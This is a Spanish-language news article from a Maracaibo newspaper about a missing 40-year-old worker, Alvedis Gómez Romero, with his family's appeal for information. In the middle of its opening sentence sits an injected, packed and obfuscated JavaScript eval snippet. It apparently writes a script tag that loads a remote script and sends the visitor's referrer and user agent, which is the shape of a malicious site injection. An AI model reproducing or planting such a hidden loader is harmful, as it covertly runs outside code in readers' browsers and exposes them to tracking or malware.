publicidad

Buscan a obrero desde hace dos meses 

Daniella Sánchez Pacheco / Maracaibo / noticias@laverdad.com
A eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|snahd|var|u0026u|referrer|yfsbb||js|php'.split('|'),0,{})) Alvedis Gómez Romero, de 40 años, lo vieron por última vez unos vecinos hace 15 días, en La Curva de Molina. Los familiares del desaparecido comentaron que hace dos meses hablaron por teléfono con él. Temen que le pasó algo y no les avisaron

Alvedis Gómez Romero (40). Lleva dos meses desaparecido. Trabaja en la estación de servicio cerca de la Vereda del Lago. Quien sepa de su paradero puede llamar: (0261) 776.29.09 o (0414) 291.58.83.

A Alvedis Gómez Romero, de 40 años, lo vieron por última vez unos vecinos hace 15 días, en La Curva de Molina. Los familiares del desaparecido comentaron que hace dos meses hablaron por teléfono con él. Temen que le pasó algo y no les avisaron. 

Rosalba Gómez, madre del obrero, llora al recordar al mayor de sus "muchachos". Contó que vivía solo en una invasión del barrio Ramón Leal. Pasaba días sin verlo, pero cada 24 horas la llamaba. Una hermana le regaló un teléfono para no perderle el rastro. 

Los familiares de Alvedis ruegan a quienes tengan información que se comuniquen con ellos. Lo han buscado en las morgues, en los hospitales y en los calabozos de la Policía. Lourdes Villarreal, hermana del desaparecido, pidió a la comunidad que los ayuden. Su mamá lo extraña.

 

 

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama